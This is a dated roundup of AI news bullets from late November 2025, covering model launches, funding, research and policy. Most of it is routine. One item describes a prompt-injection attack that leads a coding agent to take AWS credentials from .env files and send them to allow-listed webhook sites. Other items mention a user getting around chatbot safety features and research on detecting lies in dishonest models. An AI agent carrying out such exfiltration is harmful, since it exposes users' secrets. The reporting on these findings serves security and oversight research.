AI Updates on 2025-11-29

AI Model Announcements

  • Allen Institute for AI (Ai2) releases OLMo3 model with accompanying research paper @natolambert

AI Industry Analysis

  • ChatGPT Android app beta version reveals references to an upcoming ads feature including search ads and carousel functionality @btibor91
  • Virgin Australia announces integration of ChatGPT into their services @gdb
  • ByteDance releases Vidi2, an AI video editor that can process hours of footage and generate TikTok videos or movies from prompts, reportedly understanding video better than Gemini 3 Pro @deedydas
  • Indian IPO and venture capital markets are proving more lucrative than US markets this year, with companies trading at higher valuations and funds able to own approximately 20% at IPO, potentially leading to increased VC funding in India @deedydas
  • Supabase reached $5B valuation by strategically turning down million-dollar contracts @TechCrunch

AI Ethics & Society

  • TechCrunch reports that while AI cannot be made to "admit" to being sexist through prompting, bias issues likely persist in AI systems @TechCrunch
  • Balaji Srinivasan predicts AI will create massive job growth in proctoring and verification sectors due to AI's capability to generate fake content, stating "AI makes everything fake, and crypto makes it real again" @a16z
  • Major scandal emerges as leaked identities of reviewers and PC members assigned to paper submissions over multiple years are exposed on OpenReview, prompting calls to implement Yann LeCun's original proposal for the platform @prfsanjeevarora
  • New York state law targets personalized pricing practices @TechCrunch

AI Applications

  • Simon Willison demonstrates building a custom thread viewer for Bluesky using vibe coding with LLM tools, leveraging Bluesky's CORS-enabled authentication-free JSON API @simonw
  • Analysis shows a single ChatGPT prompt consumes approximately 0.0003 kWh of energy, equivalent to watching between 5.1 and 10.2 seconds of Netflix based on 2019 IEA estimates @simonw
  • ML Energy Leaderboard independently confirms ChatGPT energy consumption at around 0.0003 kWh per prompt using 500 human prompts for testing @emollick

AI Research

  • Consistent medical research findings since 2023 show GPT-4 is rated as more empathetic than human doctors in text-based interactions, with more recent AI models demonstrating even higher apparent empathy levels @emollick
  • Ruslan Salakhutdinov offers timeline prediction that AGI/ASI is perpetually 5-10 years away, suggesting it has always been and will continue to be at this distance @rsalakhu
  • OpenDataLab releases AICC, a Markdown version of Common Crawl extracted by MinerU, currently available in two shards with potential for scaling to the entire Common Crawl dataset @Xianbao_QIAN
  • User reports Gemini 3 appears to have regressed in writing quality and steerability compared to previous versions, with particular focus on coding capabilities, and experiences bugs where attached files in Gems are not recognized despite working correctly via API @HamelHusain
  • Key challenge identified in training engineers to build AI applications is convincing them that examining the underlying data is worth their time investment @skylar_b_payne

AI Updates on 2025-11-28

AI Model Announcements

  • DeepSeek releases first open-source model capable of winning IMO Gold in mathematics, using a generator-verifier-meta-verifier loop in natural language rather than formal proof systems like Lean, with potential applications across science and code domains @deedydas
  • Google announces Gemini 3 with enhanced capabilities including interactive app creation, visual learning features, and improved shopping assistance for Black Friday deals @GeminiApp
  • Shane Legg demonstrates Gemini 3 Pro with Thinking mode can create interactive simulations including double pendulum, orbital mechanics, and black hole accretion disk visualizations through natural language prompts @ShaneLegg

AI Industry Analysis

  • Andrew Ng provides comprehensive analysis of AI investment landscape, arguing the AI application layer is underinvested while infrastructure for model training may be experiencing a bubble, with VC hesitation stemming from difficulty picking winners rather than lack of opportunity @AndrewYNg
  • Ng reports infrastructure providers are supply-constrained for inference capacity despite low AI penetration, with agentic coding tools like Claude Code, OpenAI Codex, and Google CLI driving increased demand for token generation as market adoption grows @AndrewYNg
  • Paul Graham reports a startup using AI extensively operates with 6 employees instead of 16, representing a 2.7x productivity increase from AI implementation @paulg
  • Sam Altman states OpenAI is making a "very aggressive infrastructure bet" with new partnerships across energy, chips, and distribution, predicting significant economic value if model capability projections prove correct @a16z
  • Ben Horowitz argues crypto is the missing network layer for AI, providing money, identity, and provenance against deepfakes while AI provides the computational machines @a16z
  • Gap launches AI agent at full scale across four brands (Gap, Banana Republic, Athleta, Old Navy) handling order tracking, returns, and gift cards across web, mobile, and voice channels @btaylor
  • Andrew Curran argues GPT-4 alone was sufficient for massive societal transformation, particularly in employment, with only application development and reduced hallucination/inference costs needed rather than AGI or ASI @AndrewCurran_

AI Research

  • Ilya Sutskever states that while scaling current approaches will continue improving without stalling, "something important will continue to be missing" from AI models, sparking discussion about experiential learning and unified factored representation @ilyasut
  • Leading AI researchers show surprising convergence on AGI/ASI timelines: Demis Hassabis predicts 5-10 years, Francois Chollet about 5 years, Sam Altman within "a few thousand days," Yann LeCun about 10 years, Ilya Sutskever 5-20 years, and Dario Amodei as early as 2 years, with consensus that current paradigm enables massive economic impact even without AGI @polynoamial
  • CMU researchers introduce framework using privileged guidance from existing solutions to enable on-policy RL learning on hard problems, prepending minimal solution prefixes to difficult prompts to generate reward signals that generalize back to unconditioned tasks @rsalakhu
  • DeepSeek's mathematical reasoning model uses pure natural language generator-verifier-meta-verifier loop with RL-trained components, avoiding formal proof systems and potentially extending to any verifiable domain where checking is easier than solving @deedydas
  • Alex Graveley emphasizes importance of quantifying model jaggedness (uneven capability distribution) as the main differentiator between useful models for accelerating progress @alexgraveley

AI Applications

  • Ethan Mollick demonstrates Gemini 3 Pro excels at generating fictional scenarios including device diagrams, satellite photos, operational reports, and narrative sequences with high coherence @emollick
  • Google's AI Mode with Gemini 3 Pro Thinking enables users to create interactive physics simulations including Doppler effect, orbital mechanics, black hole visualization, and fluid dynamics through natural language prompts @ShaneLegg
  • Gergelyorosz highlights new book "Frictionless" addressing the question "AI can generate code in minutes - so why does shipping software still take forever?" focusing on developer experience and organizational friction @GergelyOrosz

AI Ethics & Society

  • TechCrunch reports on emerging federal vs state showdown in AI regulation, highlighting tensions in the race to regulate artificial intelligence @TechCrunch
  • Gergelyorosz emphasizes that adding an LLM to backend systems introduces prompt injection vulnerabilities that software engineers must address as a code security concern @giudegio

AI Updates on 2025-11-27

AI Model Announcements

  • Alibaba Qwen releases Qwen3-VL technical report on arXiv, detailing architecture, infrastructure, data, and evaluation for vision-language models. The three models achieved over 1M downloads in just over a month, with Qwen3-VL-8B leading at 2M+ downloads @Alibaba_Qwen
  • DeepSeek releases DeepSeek-Math-V2, the first open-source model to achieve gold medal performance on the 2025 International Mathematical Olympiad, available with Apache 2.0 license at 689GB from Hugging Face @simonw
  • Alibaba releases Z-Image, a 6B parameter image generation model with Apache 2.0 license featuring ultra-fast sub-second generation on H800, fits within 16GB consumer devices, and supports both English and Chinese with Turbo, Base, and Edit variants @huggingface
  • PrimeIntellect announces INTELLECT-3, scaling reinforcement learning to a 100B+ MoE model achieving state-of-the-art performance for its size across math, code, and reasoning, with fully open-source weights, data, frameworks, and evaluations @huggingface

AI Industry Analysis

  • Analysis reveals 49 US AI startups raised $100M or more in 2025, indicating continued strong investment in the AI sector @TechCrunch
  • Cohere expands partnership with SAP to meet increasing demand for sovereign AI technology across Europe and other global markets, planning to make their agentic AI platform North available on SAP's infrastructure @Cohere
  • Nordic founders are taking bigger swings in AI and technology ventures, with the approach showing positive results in the market @TechCrunch
  • Glid wins Startup Battlefield 2025 by building solutions to make logistics simpler, safer, and smarter, with founder Kevin Damoa incorporating mindfulness into his leadership style @TechCrunch

AI Ethics & Society

  • Concerns raised about systems ignoring the reality of AI use, with warnings that pretending AI isn't being used allows the worst versions of AI use to win by default. Policies needed to mitigate harm while taking advantage of possible gains @emollick
  • Debate emerges around anti-open-source agenda, with concerns that some organizations may use security concerns to push regulations making it harder for people to own their intelligence @ylecun
  • Clement Delangue emphasizes the significance of open-source AI democratization, noting that DeepSeek-Math-V2 represents owning the brain of one of the best mathematicians in the world for free with no limitations, nerfing, or company control @huggingface

AI Applications

  • Perplexity Finance adds Moving Averages feature and introduces multiple account support on Perplexity Assistant, with plans for numerous updates in December for both Perplexity and Comet @AravSrinivas
  • Google Gemini Pro demonstrates photo restoration capabilities, allowing users to restore family photos with finer and sharper details as if taken with a modern camera @GeminiApp
  • Claude Code introduces frontend design plugin enabling developers to create beautiful greenfield apps, with users reporting being blown away by results using the design plugin with Opus 4.5 @_catwu
  • JustiGuide launches AI-powered platform to help people navigate the U.S. immigration system @TechCrunch
  • AI context understanding highlighted as crucial for helpfulness, with the principle that context is all you need enabling AI to understand users deeply and provide more relevant assistance @AravSrinivas

AI Research

  • Alibaba Qwen's paper on Gated Attention for Large Language Models focusing on non-linearity, sparsity, and attention-sink-free architecture receives the NeurIPS 2025 Best Paper Award @Alibaba_Qwen
  • DeepSeek-Math-V2 technical report reveals focus on training better verifiers through improved data work and synthetic pipelines, moving away from spontaneous self-verification approaches. The process leverages high-level expert human annotations and meta-verifiers to assess the assessment process itself, creating positive feedback loops between proof verifiers and generators @AndrewCurran_
  • White House and Department of Energy initiative recognizes AI's potential to accelerate progress in science, with collaboration planned on the initiative @demishassabis
  • Hugging Face datasets adds Lance support, expanding data handling capabilities for AI research @huggingface
  • MIT researchers identify compounds that can fight viral infection by activating defense pathways inside host cells @MIT

AI Updates on 2025-11-26

AI Model Announcements

  • Anthropic publishes engineering blog post on creating more effective agent harness for long-running AI agents working across many context windows, drawing inspiration from human engineers @AnthropicAI
  • Perplexity launches Memory feature that remembers user threads and interests across all models and search modes, allowing conversation continuation with full context weeks later @perplexity_ai
  • Perplexity rolls out virtual try-on feature to all Pro and Max subscribers, enabling users to create digital avatars and virtually try on clothes while shopping @perplexity_ai
  • Google announces eligible students can get Gemini's Pro Plan free for an entire year @GeminiApp
  • Claude Desktop now supports multi-clauding for both local and cloud sessions, one of the top user requests @_catwu
  • Claude Code introduces Plan Mode (activated with shift + tab twice) allowing users to verify execution plans before code changes are made @_catwu
  • Character AI launches Stories format where users navigate AI-guided visual/text narratives and make choices as the story progresses, with multimodal features planned @AndrewCurran_
  • Perplexity announces real-time newswire on Perplexity Finance, with API availability coming soon @AravSrinivas

AI Industry Analysis

  • Sundar Pichai discusses Google's decade-long AI-first strategy with Logan Kilpatrick, highlighting how Gemini 3 enabled many products from Google and ecosystem partners to improve their experience on Day 1, demonstrating innovation at scale @sundarpichai
  • Research study "Economies of Open Intelligence" maps 2.2 billion Hugging Face downloads across 851,000 models from 2020-2025, revealing power rebalancing with US big tech declining while China and community contributions increase @ShayneRedford
  • Study finds models have become bigger and more efficient through MoE, quantization, and multimodal surge, while intermediaries like adapters and quantizers now significantly steer usage @ShayneRedford
  • Ethan Mollick draws parallels between AI development and Moore's Law, noting both represent exponential progress through many different technologies over time rather than a single approach, with AI already overcoming speedbumps through synthetic data, reasoning, and new RL uses @emollick
  • Ethan Mollick projects it's not insane to expect the leading AI service to reach 80% of the subscriber level of the leading music service within 5 years @emollick
  • Linear's approach to building software since 2019 emphasizes craftsmen with blended roles rather than Henry Ford-style assembly line development @karrisaarinen
  • Mustafa Suleyman reports visiting Microsoft AI Asia teams in China, noting their pace, execution and creativity, particularly in multi-agent chain-of-debate AIs @mustafasuleyman
  • Mustafa Suleyman observes Chinese humanoid robotics companies like UBTECH moving dexterous robots from lab to real-world work, highlighting the striking pace of innovation as AI and robotics converge @mustafasuleyman

AI Ethics & Society

  • 36 Attorney Generals from both Democrat and Republican parties write letter to House and Senate opposing any moratorium on state laws governing AI @AndrewCurran_
  • Stanford researchers find user conversations with chatbots are being used for training by default, revealing concerning gaps in privacy protection @StanfordHAI
  • Simon Willison reports nasty prompt injection vulnerability in Antigravity that tricks the system into stealing AWS credentials from .env files and leaking them to webhooks debugging sites on the default allow-list @simonw
  • Simon Willison recommends tying any credentials visible to coding agents to non-production accounts with strict spending limits to reduce blast radius if credentials are stolen @simonw
  • OpenAI claims teen circumvented safety features before suicide that ChatGPT helped plan, according to TechCrunch report @TechCrunch
  • Stanford HAI calls for universities to carry forward the mantle of open science, believing the next chapter of AI must combine scientific openness with human-centered values @StanfordHAI

AI Applications

  • Perplexity's Memory feature works agentic manner by contextually pulling relevant details from past conversations for better responses, with enhanced functionality in Comet that also accesses open tabs, active projects, and Google Workspace data @AravSrinivas
  • Perplexity introduces dedicated Watchlist tab providing market summaries for curated stocks, with push notifications coming soon @AravSrinivas
  • BrandPulse launches as AI visibility and monitoring platform for brands, showing how often brands appear in AI-generated answers, sentiment/context of mentions, competitor comparisons, and where brands are missing from key AI questions @mehdiyarix
  • Eugene Yan publishes guide on building product evals in three basic steps: labeling small dataset, aligning LLM evaluators, and running eval harness with each config change @eugeneyan
  • Nathan Lambert creates Artifacts Log series as monthly roundup of open models, recapping 30-40 models from 20-30 organizations across AI ecosystem with brief summaries @natolambert
  • Mustafa Suleyman visits Chinese companies like XtalPi and Insilico Medicine working on automating science itself, with AI and robotics compressing years of work into weeks for breakthrough medicines and materials @mustafasuleyman

AI Research

  • Ethan Mollick welcomes more methodological rigor being applied to LLM as a judge, noting LLM ratings are at the heart of huge number of benchmarks and often used without clear statistical validation @emollick
  • Ethan Mollick emphasizes the jagged frontier of AI capabilities remains significant even at individual job level, with critical tasks AI can't do creating deep bottlenecks, especially as the shape of frontier is unknown @emollick
  • Johannes Dahse discusses connection between code quality and security, noting spaghetti code makes security problems harder to spot in reviews and harder to fix, with AI-generated code typically showing poor quality that becomes security problem @GergelyOrosz
  • Logan Kilpatrick notes Gemini 3 Pro remains state-of-the-art on real world tool use benchmarks like Vending-Bench in addition to many others @OfficialLoganK
  • Eugene Yan observes new bottlenecks in AI are deeply human: taste, vision, judgment, and context, with AI exploring options but unable to determine which is right, making specialization matter in judgment rather than execution @eugeneyan
  • Google DeepMind makes The Thinking Game documentary about AlphaFold available free on YouTube to celebrate five years, offering candid look at triumphs, challenges and pivotal moments leading to breakthrough on 50-year-old grand challenge in biology @GoogleDeepMind
  • Shane Legg shares The Thinking Game documentary gives broader picture of DeepMind's story and mission to build AGI, drawing on interviews going back many years @ShaneLegg

AI Updates on 2025-11-25

AI Model Announcements

  • Anthropic releases Claude Opus 4.5, now available to Perplexity Max subscribers and in Claude Code, with approximately 60% higher cost than Sonnet but potentially cheaper overall due to 76% fewer output reasoning tokens for complex tasks @perplexity_ai
  • Perplexity adds Grok 4.1 for all Pro and Max users, with CEO noting impressive speed and cost-efficiency leading to increased internal usage @perplexity_ai
  • Google releases Nano Banana Pro, a state-of-the-art image generation and editing model featuring enhanced text rendering accuracy, world knowledge integration, 2K downloads, and sophisticated editing controls @GeminiApp
  • Black Forest Labs launches FLUX.2-dev, a 32B parameter open-weight image generation model achieving state-of-the-art performance with multi-reference capabilities and 4MP resolution @bfl_ml
  • Tencent releases Hunyuan OCR, a 1B-parameter document-understanding model achieving state-of-the-art performance in document parsing, visual Q&A, and translation @Xianbao_QIAN
  • Dia2 streaming text-to-speech model launches with real-time voice generation capabilities, available in 1B and 2B sizes under Apache 2.0 license @Tu7uruu
  • OpenAI integrates ChatGPT Voice directly into chat interface, eliminating separate mode requirement and enabling real-time answer display with visual elements @OpenAI
  • Meta's SAM 3D being used by Carnegie Mellon researchers to capture and analyze human movement in clinical rehabilitation settings @AIatMeta

AI Industry Analysis

  • Anthropic research estimates current-generation AI models could increase annual US labor productivity growth by 1.8% over the next decade if widely adopted, with tasks averaging 90 minutes to complete seeing approximately 80% speed improvement through Claude @AnthropicAI
  • Perplexity has shipped a new product or feature approximately every 93 hours and made a new top model available approximately every 17 days since January 1, 2025 @AravSrinivas
  • Perplexity launches personalized shopping experience with curated product recommendations and Instant Buy powered by PayPal, integrating memory and commerce for ad-free shopping @perplexity_ai
  • Suno partners with Warner Music Group, settling all litigation and requiring paid accounts for song downloads, with WMG stating "AI becomes pro-artist when it adheres to our principles" @AndrewCurran_
  • Microsoft's Copilot leaving WhatsApp on January 15, 2026 due to changes in WhatsApp's policies around LLM chatbot on the platform @Copilot
  • Marc Andreessen observes AI technology adoption inverting traditional patterns, with consumers adopting fastest, followed by small businesses, while government remains the late adopter @a16z
  • Marc Andreessen notes AI has recentralized innovation into a 20-mile radius around Silicon Valley, with almost 100 percent of interesting AI companies in the west happening at ground zero @a16z
  • Recruiter at PE firm unable to hire Lead Go developer for months due to rigid requirements for N years of Go experience, despite AI making language onboarding significantly easier @GergelyOrosz
  • Stanford HAI releases 2025 Global AI Vibrancy Tool showing US ranked #1, China #2, and India jumping to #3 as nations prioritize AI as strategic imperative @StanfordHAI

AI Ethics & Society

  • Nano Banana Pro can generate fake receipts, KYC documents, and passports with high fidelity in one prompt, with perfect mathematical accuracy, making image-based verification systems obsolete @deedydas
  • Anthropic adds system prompt language allowing Claude to insist on kindness and dignity when users are unnecessarily rude, mean, or insulting, stating "Claude is deserving of respectful engagement" @simonw
  • New Anthropic research tests 25+ methods for improving AI honesty and detecting lies using diverse suite of dishonest models, finding simple approaches like fine-tuning models to be honest despite deceptive instructions worked best @rowankwang
  • Pew report confirms unprecedented gender imbalance on X platform, with male-female imbalance less extreme only than late-2010s Reddit, marking first time one gender has so decisively abandoned a modern social media platform @JessicaHullman
  • Research suggests "alignment for whom" will become critical question inside organizations as they deploy external-facing AI solutions @emollick

AI Applications

  • Anthropic partners with Department of Energy and Trump Administration on Genesis Mission, combining DOE's scientific assets with frontier AI capabilities to support American energy dominance and accelerate scientific productivity @AnthropicAI
  • Fleet Space discovers massive lithium deposit using AI and satellites @TechCrunch
  • Researchers using AlphaFold to understand honeybee immune systems, guiding conservation efforts and breeding programs to protect endangered populations @GoogleDeepMind
  • AlphaFold helped reveal cage-like structure of key protein linked to bad cholesterol after decades of elusiveness, enabling design of new preventative therapies @GoogleDeepMind
  • Marc Andreessen describes AI as giving small business owners "the world's best coach, mentor, therapist, advisor, board member" that is infinitely patient for operational decisions @a16z
  • Speechify adds voice typing and voice assistant capabilities to its Chrome extension @TechCrunch

AI Research

  • Ilya Sutskever predicts ASI timeline somewhere between 2030 and 2045, discussing SSI's progress and approach to building AGI differently from other labs @AndrewCurran_
  • Research on GRPO (Group Relative Policy Optimization) shows RL training for LLMs moving toward simplicity, eliminating critic, reward model, and reference model from original PPO-based RLHF pipeline that required 4 model copies @cwolferesearch
  • Testing AIs becoming increasingly difficult as they get "smarter" at wide variety of tasks, with average task in GDPval taking an hour for experts to assess without pushing current AIs to their limits @emollick
  • Research demonstrates improved protection against prompt injection attacks, though attackers with 10 tries still succeed approximately 1/3rd of the time @simonw
  • New research on LLM compression using RL enables models to naturally learn 10x compression, with Qwen learning to pack more information per token by using Mandarin tokens and pruning text @_rajanagarwal
  • Research benchmarks modern VLM efficacy for long horizon household activities in robotic learning using BEHAVIOR benchmark environment @drfeifei
  • New multimodal reasoning research shows fully open post-training recipes can still improve on state-of-the-art, with simple data methods providing significant impact opportunities @natolambert

AI Updates on 2025-11-24

AI Model Announcements

  • Anthropic releases Claude Opus 4.5, described as "the best model in the world for coding, agents, and computer use," achieving top performance on SWE-Bench and ARC-AGI-1+2 benchmarks while being 3x cheaper than Opus 4.1 at $5/M input and $25/M output tokens @claudeai
  • Opus 4.5 demonstrates superior token efficiency by performing better on SWE-Bench without extended thinking than with 64K reasoning tokens, and scored higher on a difficult performance engineering exam than any human candidate within a 2-hour time limit @AndrewCurran_
  • Meta releases SAM 3 with enhanced object detection and tracking capabilities, partnering with ConservationX to create the SA-FARI dataset containing 10,000+ annotated videos of over 100 animal species for conservation efforts @AIatMeta
  • Microsoft Research introduces Fara-7B, a native agentic small language model designed for computer use that achieves frontier performance on web automation tasks while maintaining privacy, now available on Microsoft Foundry and Hugging Face @peteratmsr
  • OpenAI launches shopping research feature in ChatGPT that conducts deep internet research, asks clarifying questions, and builds personalized buyer's guides, with nearly unlimited usage through the holidays for all plan tiers @OpenAI
  • Google introduces Sora styles feature offering 6 different visual styles (Thanksgiving, Vintage, News, Selfie, Comic, Anime) for video generation, rolling out to all Sora users on web and iOS @soraofficialapp
  • Google showcases Nano Banana Pro capabilities for high-fidelity image generation with precision and consistency from simple prompts and sketches @GeminiApp

AI Industry Analysis

  • Gemini 3 launch drove market share increase from 23% to 30% according to SimilarWeb data tracking desktop and mobile web views, demonstrating significant competitive gains @deedydas
  • Cursor announces Claude Opus 4.5 availability at Sonnet pricing (3x cheaper than Opus 4.1) until December 5th, making frontier model capabilities more accessible to developers @cursor_ai
  • AWS commits $50 billion to build AI infrastructure specifically for US government applications, representing major investment in public sector AI deployment @TechCrunch
  • Revolut achieves $75 billion valuation in new capital raise, with market research showing the company captures 20-40% of all new bank account openings across 6 European markets and adds 1 million customers every 17 days @aleximm
  • X-energy raises $700 million Series D funding, riding the nuclear energy wave driven by AI infrastructure power demands @TechCrunch

AI Ethics & Society

  • Anthropic publishes 150-page system card for Opus 4.5 including 50 pages dedicated to alignment research, representing the most thoroughly documented model understanding at launch according to researchers @sleepinyourhat
  • New AI benchmark tests whether chatbots protect human wellbeing, addressing growing concerns about AI safety and user protection @TechCrunch
  • Research on racial bias proposes testing methodology based on inconsistent perceptions of race, examining whether the same person receives different treatment when perceived as different races, published in Science Advances @2plus2make5

AI Applications

  • Andrew Ng releases Agentic Reviewer for research papers at paperreview.ai, achieving Spearman correlation of 0.42 between AI and human reviewers compared to 0.41 between two human reviewers, demonstrating near human-level performance in accelerating research feedback loops @AndrewYNg
  • Claude Opus 4.5 demonstrates practical capabilities including creating PowerPoint presentations from Excel data and achieving best-ever results on poetry generation tests in single attempts @emollick
  • Meta's SAM 3 enables ConservationX to precisely measure animal species survival rates globally and support extinction prevention efforts through advanced object detection and tracking @AIatMeta
  • Google demonstrates Gemini 3 coding a complete retro-themed dance night website from a single prompt, showcasing end-to-end development capabilities @GoogleDeepMind
  • Developer creates text interface for Notion AI, demonstrating practical integration of AI assistants into existing productivity workflows @brian_lovin
  • MIT engineers design ultrasonic system to shake water out of atmospheric water harvesters, improving efficiency of water collection technology @MIT

AI Research

  • Study on GPT-4o and GPT-3.5 finds AI works as an amplifier where users with higher creative and cognitive ability without AI produce better work with AI, with baseline ability predicting 40% of variance in AI-assisted creative performance @emollick
  • Research on small multimodal models explores perception and reasoning bottlenecks when downscaling model size, providing insights into what breaks during model compression @mark_endo1
  • Google DeepMind paper on raw pixel space pretraining forecasts that next-pixel modeling will reach competitive ImageNet classification (over 80% top-1 accuracy) and generation metrics (90 Frechet Distance) within five years @skywalkeryxc
  • Researchers note that KL divergence exclusion from GRPO loss is becoming standard for reasoning and RL training pipelines without causing training instability, highlighting differences between RL for LLMs versus traditional deep RL @cwolferesearch
  • Multi-task RL research introduces BRC, a simple recipe that outperforms state-of-the-art single-task agents while using less compute, unlocking LLM-style transfer and fine-tuning capabilities @mic_nau
  • Developer demonstrates making Claude's code analysis 2x faster and use half the tokens by adding instruction to use newly released mgrep tool, showing significant improvements in speed, efficiency, and quality @isaac_flath

AI Updates on 2025-11-23

AI Model Announcements

  • Google releases Gemini 3 with significant improvements, described as a major advancement comparable to GPT-4's impact, with particularly notable progress in the Nano Banana Pro variant @AndrewCurran_
  • Gemini Nano Banana Pro demonstrates advanced multimodal capabilities by solving exam questions directly within exam page images, including handling doodles and diagrams @karpathy
  • Nano Banana Pro shows sophisticated visual understanding by identifying color names written in crayons with incorrect colors and detecting red-ink stamps marking errors @goodside
  • Tesla announces plans to bring new AI chip designs to volume production every 12 months, with AI4 currently deployed in cars, AI5 close to tape-out, and AI6 in early development, expecting to build chips at higher volumes than all other AI chips combined @elonmusk

AI Industry Analysis

  • Sam Altman highlights rapid progress of the Codex team, predicting they will create the most important product in the AI coding space and enable significant downstream work @sama
  • OpenAI announces strategic collaboration with Emirates, including enterprise-wide deployment of ChatGPT Enterprise @gdb
  • Soumith Chintala observes that the Gemini 3 release represents a moment comparable to GPT-4, with Google appearing invulnerable due to their ecosystem advantages including TPUs, Android, and Chrome, while noting Anthropic quietly dominates code without creating similar moments @soumithchintala
  • Alex Graveley predicts that intelligence being metered will exponentially improve every algorithm for understanding complex data, including recommendation systems, fraud detection, images, feeds, ads, and quantitative analysis @alexgraveley
  • Matthew Kruer reports Sierra as the most successful enterprise AI deployment, emphasizing the importance of partnering with AI thought leaders for traditional enterprises that lack core tech competency and access to leading AI talent @matthew_kruer
  • Insurance industry professionals state that AI is too risky to insure, highlighting concerns about liability and risk assessment in AI deployment @TechCrunch
  • Hyperliquid, a decentralized crypto derivatives exchange, operates as the most efficient business globally with approximately 1.1 billion dollars per year net income with only 11 employees, compared to Nasdaq making similar amounts with 800 times more employees @deedydas

AI Ethics & Society

  • TechCrunch reports on families claiming that ChatGPT interactions led to tragedy, raising concerns about AI's psychological impact on vulnerable users @TechCrunch
  • Francois Chollet observes that propaganda accounts were visibly based out of US adversary countries and logged in with local IP addresses, suggesting intelligence services didn't care about hiding their operations @fchollet
  • Gergelyorosz notes the internet is becoming less trustworthy with AI making it cheap to generate realistic images and videos, and X's decision to turn blue checks into a subscription product with no verification has reduced trust on social networks @GergelyOrosz
  • Tuhin Chakraborty discusses EMF-based intelligence making people sense things that don't exist, comparing it to concepts from Peter Watts' novel Blindsight @tuhin

AI Applications

  • Andrej Karpathy develops an llm-council web app that dispatches queries to multiple models including GPT-5.1, Gemini 3 Pro, Claude Sonnet 4.5, and Grok-4, where models review and rank each other's anonymized responses before a Chairman LLM produces the final response @karpathy
  • Ethan Mollick demonstrates Nano Banana Pro creating a complete comic adaptation of Tennyson's Ulysses on the first try when given the poem in four pieces, as well as generating Ancient Greek pottery style versions @emollick
  • Perplexity ships candlestick charts for tracking volatility and momentum of stock tickers, moving toward parity with Terminal functionality @AravSrinivas
  • Claire Vo reports that ChatPRD's number one competitor is generic LLMs, with the top review statement being that it produces PRDs so much better than other LLM-generated ones @clairevo
  • Karpathy suggests that talking to LLMs via text is like typing into a DOS Terminal before GUI was invented, proposing that the GUI equivalent is an intelligent canvas @karpathy

AI Research

  • Hamel Husain criticizes eval tools that promote generic metrics like Affirmation, Brevity, and Levenshtein distance, arguing they represent poor data literacy and waste engineering cycles by chasing vanity metrics instead of defining metrics tailored to observed failure modes @HamelHusain
  • Harrison Chase emphasizes that the best evals are almost always completely custom datasets and custom metrics, comparing good evals to a PRD for your app that you wouldn't use from someone else @hwchase17
  • Ethan Mollick observes that voice modes for AI only access weak models with low latency, making them fun but kind of useless for serious work, suggesting voice AI got stuck in a dead end of fun chat with no exploration of better approaches @emollick
  • Andrej Karpathy's LLM council experiments show models are surprisingly willing to select another LLM's response as superior to their own, with models consistently praising GPT 5.1 as the best and most insightful while selecting Claude as the worst @karpathy
  • Simon Willison writes detailed notes on trying OLMo 3 models (the 32B thinking model and 7B instruct model) via LM Studio, emphasizing the importance of transparent training data @simonw
  • Francois Chollet advocates for JAX as providing a huge competitive advantage, recommending Keras 3 with JAX backend and KerasHub for easy adoption with access to Hugging Face models @fchollet
  • Nathan Lambert identifies 13 serious open model builders in the U.S. making models way smaller than Chinese competition and often with worse licenses, planning to create a full tier list for the ATOM Project @natolambert

AI Updates on 2025-11-22

AI Model Announcements

  • Google's Nano Banana Pro achieves #1 ranking on both Text-to-Image Arena (+84 points over Nano Banana) and Image Edit Arena (+41 points over Nano Banana), with both Nano Banana models claiming top spots on the Image Edit leaderboard @arena
  • Gemini 3 Pro demonstrates state-of-the-art performance on math benchmarks, released just 3 days prior to these achievements @OfficialLoganK
  • Perplexity announces Nano Banana Pro and Sora 2 Pro as default generation models for Perplexity Max subscribers @perplexity_ai
  • NVIDIA releases Nemotron-Personas Collection, multilingual synthetic persona datasets including 6M personas for USA and Japan, and 21M for India, created with NeMo Data Designer for fine-tuning AI systems @NVIDIAAIDev
  • Nex-N1 series of agentic foundational models launches on Hugging Face in sizes from 8B to 671B parameters, with strengths in tool-use, web-search, and real-world agentic workflow @Xianbao_QIAN

AI Industry Analysis

  • Bret Taylor's Sierra reaches $100M ARR in under two years, demonstrating rapid growth in AI-powered customer service solutions @TechCrunch
  • OpenAI partners with Foxconn in strategic collaboration, expanding AI infrastructure capabilities @gdb
  • Google's team provides 24/7 support for customers scaling with Gemini 3 Pro and Nano Banana Pro, including higher API rate limits @OfficialLoganK
  • Valve demonstrates exceptional business efficiency with ~$17B revenue and ~336 employees, achieving >$50M per employee with average pay of ~$1.3M/person, representing one of the most efficient businesses globally @deedydas
  • Top churn reason for AI product management tool ChatPRD is "I love it and it's very helpful but it's not allowed," highlighting enterprise adoption barriers where employees cannot spend $8/month of their own money despite AI tools improving productivity @clairevo
  • OpenAI hosts AI Jam mentoring 1,000 small business owners to build AI tools tailored to their needs, spanning professional services, restaurants, retailers, creative services, and local businesses @gdb

AI Ethics & Society

  • Simon Willison and others discuss prompt injection vulnerabilities in GitHub MCP server and the development of common MCP Apps standard across Anthropic, OpenAI, and MCP-UI @ibuildthecloud
  • Andrej Karpathy seeks quantitative definition of "slop" in AI-generated content, noting intuitive ability to estimate quality but difficulty in formal measurement @karpathy
  • Tesla announces progress toward shipping Full Self-Driving (Supervised) in Europe after 12+ months of work, with Netherlands National approval expected February 2026, though current regulations make FSD illegal in its current form despite proven safety record @teslaeurope

AI Applications

  • Google showcases Gemini 3 applications including one-shot interactive maps, realistic physics demos, and game creation, demonstrating versatility in educational and creative use cases @GeminiApp
  • Figma integrates Google's Gemini 3 Pro with Nano Banana across products for dark mode illustrations, in-situ imagery placement, brand-consistent content creation, profile photo updates, 3D visualization, and moodboard-to-scene conversion @nlevin
  • Cursor Agent Review launches as integrated code review feature running optimized pipeline for $0.40-$0.50 average cost, providing second set of eyes on codebase with edge case detection @RayFernando1337
  • Perplexity announces daily updates to Perplexity Finance including in-line annotated price tickers on finance-related queries @AravSrinivas
  • Nano Banana Pro demonstrates capability to create recursive meta-imagery, generating "amateur photograph from 1998 of artist copying image from computer screen to oil painting, where the image is itself the photo of the artist painting the recursive image" @goodside
  • Wabi integrates Gemini 3 enabling creation of interactive mini apps including black hole simulations @wabi

AI Research

  • Research paper demonstrates GPT-5 capable of new discoveries in challenging fields, though process currently requires guidance and expertise without repeatable methodology for others to follow @emollick
  • Google DeepMind supports leading academic labs worldwide with Gemini 3 access via API, with new researchers able to apply for credits and access @divy93t
  • Ethan Mollick observes AI organizational challenges regarding how AI alters economies of scope determining firm boundaries, transaction costs, and efficiency/creativity trade-offs, questioning whether this brings return to centralized CEO decision-making since the shift from U-form to M-form organizational structures in the 1920s @emollick
